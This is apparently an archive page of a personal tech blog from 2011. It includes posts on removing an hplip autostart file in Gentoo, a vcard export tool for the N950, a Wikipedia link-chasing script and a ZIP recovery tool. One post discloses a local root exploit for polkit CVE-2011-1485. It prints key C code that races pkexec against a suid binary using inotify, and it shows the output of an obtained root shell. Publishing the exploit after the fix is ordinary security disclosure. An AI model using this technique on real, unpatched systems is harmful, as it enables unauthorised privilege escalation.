Gentoo’s HP printer drivers package, net-print/hplip, if you have the gui USE flags enabled, installs /etc/xdg/autostart/hplip-systray.desktop, which makes an awful Windows-like tray app load with all desktop environments for every user on the machine. Who wants this? Every user? Tray app? Autostart? This is Linux, not Windows, right?

Upstream, i.e. Gentoo devs, doesn’t seem to want to add an autostart USE flag. I don’t feel like maintaining my own ebuild for this, either. So, the official advice is to copy hplip-systray.desktop into a special place in your own home folder, and then edit the file to have Hidden=true. Yuck. So now my start-up routine will have to spend extra CPU cycles resolving the override, not to mention the requirement for each and every user on my machine to do this. Sure I could add this extra file to the default set of files copied into each home folder on user creation for each desktop environment, but do I really want to do this? What about preexisting users? Do I really want this system installed package to require this kind of manual intervention? The obvious thing to do is just to delete /etc/xdg/autostart/hplip-systray.desktop after each time hplip installs, namely, after each update.

But the official advice calls this approach “naive”. Fuck that. I don’t want the extra overhead of working out the collision, nor do I want to have to add this file to each user’s home folder. I want that file gone, dead, vamos‘d. The thing is, it means I have to manually remove the file after each time the ebuild gets updated (and remember, I don’t want to maintain my own fork of the ebuild).

Fortunately, there’s a solution: Portage allows per-package environment variable overrides via /etc/portage/env/. By putting some monkey patching code in the right place, we can override a function inside of all subsequent hplip ebuilds to automagically remove the ugly file. Create the right directory:

sudo mkdir -p /etc/portage/env/net-print

Then, add my monkey patch code to it:

sudo vim /etc/portage/env/net-print/hplip
if ( ! type -t original_src_install >/dev/null) && (type -t src_install >/dev/null); then
        eval "$(echo 'original_src_install()'; declare -f src_install | tail -n +2)"
        src_install() {
                original_src_install
                rm -f "${D}"/etc/xdg/autostart/hplip-systray.desktop || die
        }
fi

Finally, re-emerge hplip, and it should install without the autostart file. Yes, this is one ugly bash-ism, but it seems to do the job. Any suggestions would be appreciated.


Update: A reader below has noted that a far superior way of doing this is to just put

INSTALL_MASK="/etc/xdg/autostart/hplip-systray.desktop $INSTALL_MASK"

inside of /etc/portage/env/net-print/hplip, without needing to do the monkey patching above. INSTALL_MASK is a great feature, one that is not highlighted very much at all in the documentation. The most official mention of it I could find is in make.conf‘s man page:

       INSTALL_MASK = [space delimited list of file names]
              Use this variable if you want  to  selectively  prevent  certain
              files  from  being copied into your file system tree.  This does
              not work on symlinks, but only on actual files.  Useful  if  you
              wish  to  filter  out  files  like  HACKING.gz  and TODO.gz. The
              INSTALL_MASK is processed just before a package is merged.  Also
              supported  is  a  PKG_INSTALL_MASK variable that behaves exactly
              like INSTALL_MASK except that it is processed just  before  cre‐
              ation of a binary package.

Internally in misc-functions.sh, it does essentially the same thing as my monkey patch:

install_mask() {
	local root="$1"
	shift
	local install_mask="$*"
 
	# we don't want globbing for initial expansion, but afterwards, we do
	local shopts=$-
	set -o noglob
	for no_inst in ${install_mask}; do
		set +o noglob
		quiet_mode || einfo "Removing ${no_inst}"
		# normal stuff
		rm -Rf "${root}"/${no_inst} >&/dev/null
 
		# we also need to handle globs (*.a, *.h, etc)
		find "${root}" \( -path "${no_inst}" -or -name "${no_inst}" \) \
			-exec rm -fR {} \; >/dev/null 2>&1
	done
	# set everything back the way we found it
	set +o noglob
	set -${shopts}
}
October 31, 2011 · 6 comments


Since it’s been 6 months since reported, I figure it’s been a responsible amount of time for me to wait before releasing a local root exploit for Linux that targets polkit-1 <= 0.101, CVE-2011-1485, a race condition in PolicyKit. I present you with PolicyKit Pwnage.

David Zeuthen of Redhat explains on the original bug report:

Briefly, the problem is that the UID for the parent process of pkexec(1) is read from /proc by stat(2)’ing /proc/PID. The problem with this is that this returns the effective uid of the process which can easily be set to 0 by invoking a setuid-root binary such as /usr/bin/chsh in the parent process of pkexec(1). Instead we are really interested in the real-user-id. While there’s a check in pkexec.c to avoid this problem (by comparing it to what we expect the uid to be – namely that of the pkexec.c process itself which is the uid of the parent process at pkexec-spawn-time), there is still a short window where an attacker can fool pkexec/polkitd into thinking that the parent process has uid 0 and is therefore authorized. It’s pretty hard to hit this window – I actually don’t know if it can be made to work in practice.

Well, here is, in fact, how it’s made to work in practice. There is as he said an attempted mitigation, and the way to trigger that mitigation path is something like this:

     $ sudo -u `whoami` pkexec sh
     User of caller (0) does not match our uid (1000)

Not what we want. So the trick is to execl to a suid at just the precise moment /proc/PID is being stat(2)’d. We use inotify to learn exactly when it’s accessed, and execl to the suid binary as our very next instruction.

	if (fork()) {
		int fd;
		char pid_path[1024];
		sprintf(pid_path, "/proc/%i", getpid());
		printf("[+] Configuring inotify for proper pid.\n");
		close(0); close(1); close(2);
		fd = inotify_init();
		if (fd < 0)
			perror("[-] inotify_init");
		inotify_add_watch(fd, pid_path, IN_ACCESS);
		read(fd, NULL, 0);

All the code up to this point makes this process block until /proc/PID is read, at which point it:

		execl("/usr/bin/chsh", "chsh", NULL);

Which is suid. Meanwhile in the other process, we launch pkexec, which skirts passed the initial checks, but gets fooled when we change the uid of the parent process:

	} else {
		sleep(1);
		printf("[+] Launching pkexec.\n");
		execl("/usr/bin/pkexec", "pkexec", "/bin/sh", NULL);
	}

And it works:

 $ pkexec --version
 pkexec version 0.101
 $ gcc polkit-pwnage.c -o pwnit
 $ ./pwnit 
 [+] Configuring inotify for proper pid.
 [+] Launching pkexec.
 sh-4.2# whoami
 root
 sh-4.2# id
 uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm)
 sh-4.2#

This exploit is known to work on polkit-1 <= 0.101. However, Ubuntu, which as of writing uses 0.101, has backported 0.102's bug fix. A way to check this is by looking at the mtime of /usr/bin/pkexec -- April 19, 2011 or later and you're out of luck. It's likely other distributions do the same. Fortunately, this exploit is clean enough that you can try it out without too much collateral.

So head on over and try it out! You can watch it in action over on YouTube as well:

Greets to Dan.

October 5, 2011 · 3 comments


My work for Grafitroniks was featured in an expo in Paris last week:

Viscom 2011

Viscom 2011

I built the PrintCompositor.

October 1, 2011 · 1 comment


The vcard export GUI feature of the contacts app on the N950 is broken. The console app “vcardconverter” successfully digests vcards, but you won’t be able to get them out. In my case, it converted some back to vcards, but failed on others. Unacceptable. For updating to today’s new firmware, I didn’t want to take a full backup of the tracker database, choosing instead to start fresh, suspecting that the new firmware fixes a lot of bugs. How, then, was I to backup my contacts, if I wasn’t going to backup the tracker? Vcard is the perfect neutral format for this.

So in a few lines of easy Qt/C++, I wrote vcardexport, a console application. It spits all the contacts out into one giant vcard file that can be reimported later with vcardconverter. Simple and easy. The biggest pain was getting the Aegis manifest correct, as the auto-generation tool is broken, and documentation is kind of sparse, but it’s all sorted now.

You can browse the source here or download the latest deb from here.

Usage:

$ /opt/vcardexport/bin/vcardexport > ~/vcards.vcf

Hope this is helpful. Enjoy the new firmware:

    image        [state    progress         transfer     flash speed]
---------------------------------------------------------------------
[x] cert-sw      [finished   100 %       1 /       1 kB      NA     ]
[x] cmt-2nd      [finished   100 %      95 /      95 kB      NA     ]
[x] cmt-algo     [finished   100 %     789 /     789 kB      NA     ]
[x] cmt-mcusw    [finished   100 %    6008 /    6008 kB    2933 kB/s]
[x] xloader      [finished   100 %      23 /      23 kB      NA     ]
[x] secondary    [finished   100 %      88 /      88 kB      NA     ]
[x] kernel       [finished   100 %    2708 /    2708 kB    2024 kB/s]
[x] rootfs       [finished   100 %  326205 /  326205 kB    7339 kB/s]
[x] mmc          [finished   100 %  204747 /  204747 kB   17604 kB/s]
Updating SW release
Success
September 19, 2011 · 1 comment


Ryan had a pretty funny idea I saw in his github — How many clicks does it take on Wikipedia from any given article to the article on “Philosophy”. He started to implement it by choosing the first link on each page and following that. He wrote it in node.js and jsdom. I rewrote his script (97% rewrite, according to git) to instead generate a tree structure of all the links on each page and then do a breadth first search on the tree to continually request new pages in parallel. It seems to be working amazingly well:

$ node wiki-philosophy.js Seinfeld
Seinfeld
        Nihilism
                Philosophy

$ node wiki-philosophy.js Superman
Superman
        Cultural icon
                Philosophy

$ node wiki-philosophy.js Burrito
Burrito
        Mexican cuisine
                Tribute
                        Philosophy

Play around with it! I’ve posted it with install instructions over in my git repository. Hopefully Ryan will pull back my changes into his repository and continue to develop this into something creative.

September 7, 2011 · (No comments)




Back in February I gave a workshop seminar on the basics of Qt — covering signals, slots, the metaobject system, QtGui, QtWebkit, and Qt Creator. We all built a fully functional web browser together, over the course of about an hour. The entirety was spoken just off the top of my head, so it might be slightly disorganized, but there was pretty high reception from it. I know that following the presentation, at least two people went on to use Qt for major projects. Here’s the presentation:


Direct YouTube Link

Unfortunately, the projector in the room was broken, so we all had to huddle around my laptop, which actually had the effect of making the workshop much more intimate. If you’re interested, here’s the code we wrote together.

June 25, 2011 · (No comments)


The Nokia E52 is the most awesome phone ever made. It has a normal T9 keypad, GPS, 3G, Wifi, and runs Symbian. These are the features I need. Sure Android and others are more modern operating systems, but there is no smartphone OS that has phones with T9 hardware keypads of this form factor, except for the E52. There is one problem: it’s not made anymore

There are two models of the E52 — the E52-1, which has European 3G frequencies, and the E52-2, which has North American 3G frequencies. I’m looking for the E52-2.

If anyone knows there whereabouts of an E52-2, please inform me. I will bid high.

June 19, 2011 · 10 comments


Congratulations to the neccesitas project for joining KDE. I’m not sure what this means as far as KDE’s orientation or how this reflects the latest attitude of, “shit! we spent all this time fussing over Nokia’s mobile hype, and now we realize the desktop is rotting and we need to save it,” but it’s nonetheless exciting to know that neccesitas is supported by a good organization.

With that said, maybe it’s time for me to find a smartphone. I still use an old Nokia 1100, which doesn’t support much more than calling and SMS. And Snake II. Windows Phone 7 is out. Meego is dead. WebOS is limping. Blackberry has an arcane dev environment. What’s that leave? Junked up Android. As a platform, Android seems to already be experiencing some bloat and disorganization and Java doesn’t seem too hot. But at the very least it runs Qt now.

The big problem is finding a satisfactory phone. My critera are fairly simple:

  • QWERTY physical keyboard (I actually would prefer T9, but this is now long past :-( ). This is very important. I will not compromise about this.
  • GSM that runs on AT&T’s 3G network, as well as general GSM support for Europe.
  • Rootable and/or rom-unlockable.
  • Sensible update policy / recent operating system.
  • Big pretty screen.
  • Fast processor.
  • Solid construction.
  • The usual assortment of GPS, Bluetooth, etc do-dads.
  • But nothing like this exists. Well, the Xperia Pro looks almost perfect — AT&T 3G (approx), fast processor, pretty screen, great keyboard, etc — except so far it’s only available for pre-order in the UK and it’s looking unlikely it’ll be hitting the US.

    What is out there that meets these criteria? Why has my research turned up dry continually?

    [Sidenote: actually, the perfect phone for me might be the very dated Nokia E52, but I can't seem to find a north american model anywhere, even on eBay.]

    June 2, 2011 · 43 comments


    My brother is a wonderful photographer, and took 14 gigabytes of photos at my recent graduation from Columbia, some of which I hope to post on PhotoFloat — my web 2.0 photo gallery done right via static JSON & dynamic javascript.

    . He was kind enough to upload a ZIP of the RAW (Canon Raw 2 – CR2) photos to my FTP server overnight from his killer 50mbps pipe. The next day, he left for a long period of traveling.

    I downloaded the ZIP archive, eager to start playing with the photographs and learning about RAW photos and playing with tools like dcraw, lensfun, and ufraw, and also seeing if I could forge Canon’s “Original Decision Data” tags. To my dismay, the ZIP file was corrupted. I couldn’t ask my brother to re-upload it or rsync the changes or anything like that because he was traveling and it was already a great burden for him to upload these in the nick of time. I tried zip -F and zip -FF and even a few Windows shareware tools. Nothing worked. So I decided to write my own tool, using nothing more than the official PKZIP spec and man pages.

    First a bit about how ZIP files are structured — everything here is based on the famous official spec in APPNOTE.TXT. Zip files are structured like this:

        [local file header 1]
        [file data 1]
        [data descriptor 1]
        . 
        .
        .
        [local file header n]
        [file data n]
        [data descriptor n]
        [archive decryption header] 
        [archive extra data record] 
        [central directory]
        [zip64 end of central directory record]
        [zip64 end of central directory locator] 
        [end of central directory record]
    

    Generally unzippers seek to the central directory at the end of the file, which has the locations of all the files in the zip, along with their sizes and names. It reads this in, then seeks back up to the top to read the files off one by one.

    The strange thing about my brother’s broken file was that the beginning files would work and the end files would work, but the middle 11 gigabytes were broken, with Info-ZIP complaining about wrong offsets and lseeks. I figured that some data had been duplicated/reuploaded at random spots in the middle, so the offsets in the zip file’s central directory were broken.

    For each file, however, there is a local file header and an optional data descriptor. Each local file header starts with the same signature (0x04034b50), and contains the file name and the size of the file that comes after the local file header. But sometimes, the size of the file is not known until the file has already been inserted in the zip file, in which case, the local file header reports “0″ for the file size and sets bit 3 in a bit flag. This indicates that after the file, of unknown length, there will be a data descriptor that says the file size. But how do we know where the file ends, if we don’t know the length before hand? Well, usually this data is duplicated in the central directory at the end of the zip file, but I wanted to avoid parsing this all together. Instead, it turns out that, though not in the official spec, APPNOTE.TXT states, “Although not originally assigned a signature, the value 0x08074b50 has commonly been adopted as a signature value for the data descriptor record. Implementers should be aware that ZIP files may be encountered with or without this signature marking data descriptors and should account for either case when reading ZIP files to ensure compatibility. When writing ZIP files, it is recommended to include the signature value marking the data descriptor record.” Bingo.

    So the recovery algorithm works like this:

    • Look for a local file header signature integer, reading 4 bytes, and rewinding 3 each time it fails.
    • Once found, see if the size is there. If the size is in it, read the data to the file path.
    • If the size isn’t there, search for the data descriptor signature, reading 4 bytes, and rewinding 3 each time it fails.
    • When found, rewind to the start of the data segment and read the number of bytes specified in the data descriptor.
    • Rewind to 4 bytes after the local file header signature and repeat process.

    The files may optionally be deflated, so I use zlib inline to inflate, the advantage of which is that this has its own verification built in, so I don’t need to use zip’s crc32 (though I should).

    Along the way there is some additional tricky logic for making sure we’re always searching with maximum breadth.

    The end result of all this was… 100% recovery of the files in the archive, complete with their full file names. Win.

    You can check out the code here. Suggestions are welcome. It’s definitely a quick hack, but it did the job. Took a lot of fiddling with to make it work, especially figuring out __attribute__((packed)) to turn off gcc’s power-of-two padding.

    May 21, 2011 · 16 comments